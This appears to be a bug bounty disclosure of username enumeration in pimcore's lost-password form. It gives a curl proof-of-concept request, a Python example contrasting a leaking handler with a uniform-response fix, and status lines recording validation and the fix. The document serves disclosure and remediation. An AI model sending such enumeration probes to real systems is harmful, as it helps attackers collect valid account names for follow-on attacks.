Observable Response Discrepancy in pimcore/pimcore

Valid

Reported on

Aug 31st 2021


✍️ Description

It is possible to enumerate usernames via the forgot password functionality.

🕵️‍♂️ Proof of Concept

When entering a username that is not registered in the application, the response reads "User unknown", whereas a registered username produces a different response. The following curl command demonstrates this:

curl -i -s -k -X $'POST' \
    -H $'Host: demo.pimcore.fun' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://demo.pimcore.fun/admin/login/lostpassword' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 82' -H $'Origin: https://demo.pimcore.fun' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Te: trailers' -H $'Connection: close' \
    -b $'PHPSESSID=6f1c18e8cc8503830b327897c8fb8678' \
    --data-binary $'username=RandomUsername&csrfToken=a1b983212b46f65236f802e94253af4dc2d6320e&submit=' \
    $'https://demo.pimcore.fun/admin/login/lostpassword'

💥 Impact

It is possible to enumerate usernames of registered users in the application. An attacker can then chain this information with other attacks.
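The discrepancy described above, modelled as an added example (not pimcore's own code): a lost-password handler that leaks account existence beside a hardened version that answers identically either way, plus the regression check a maintainer would keep to make sure the two reply paths never diverge again. The user store, e-mail addresses and the `send_reset_mail` stand-in are constructed for the example.

```python
# Constructed sample user store: username -> e-mail (assumption for this example).
USERS = {"admin": "admin@example.invalid", "editor": "editor@example.invalid"}

# One message for every outcome, so the body carries no account-existence signal.
GENERIC_MESSAGE = "If the account exists, a reset link has been sent."


def send_reset_mail(email: str) -> None:
    """Stand-in for the mailer; does nothing so the example runs offline."""
    return None


def lost_password_vulnerable(username: str) -> tuple[int, str]:
    """Handler shaped like the behaviour in the report: the reply text
    differs depending on whether the username is registered."""
    if username not in USERS:
        return 200, "User unknown"
    send_reset_mail(USERS[username])
    return 200, "A reset link has been sent to your e-mail address."


def lost_password_hardened(username: str) -> tuple[int, str]:
    """Same endpoint with a uniform response: status and body are identical
    for known and unknown usernames; only the side effect (sending mail)
    depends on the lookup, and that is invisible to the requester.
    Caveat: this removes the body discrepancy the report describes; response
    timing is a separate channel and is not addressed here."""
    email = USERS.get(username)
    if email is not None:
        send_reset_mail(email)
    return 200, GENERIC_MESSAGE


def responses_distinguishable(handler, known: str, unknown: str) -> bool:
    """Regression check for the fix: True if a registered and an unregistered
    username yield different (status, body) pairs from the handler."""
    return handler(known) != handler(unknown)


if __name__ == "__main__":
    for name, handler in (("vulnerable", lost_password_vulnerable),
                          ("hardened", lost_password_hardened)):
        leaks = responses_distinguishable(handler, "admin", "RandomUsername")
        print(f"{name}: responses differ = {leaks}")
```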

We have contacted a member of the pimcore team and are waiting to hear back 3 months ago
Bernhard Rusch validated this vulnerability 3 months ago
Nuno Lopes has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on d0a4de 3 months ago
Bernhard Rusch has been awarded the fix bounty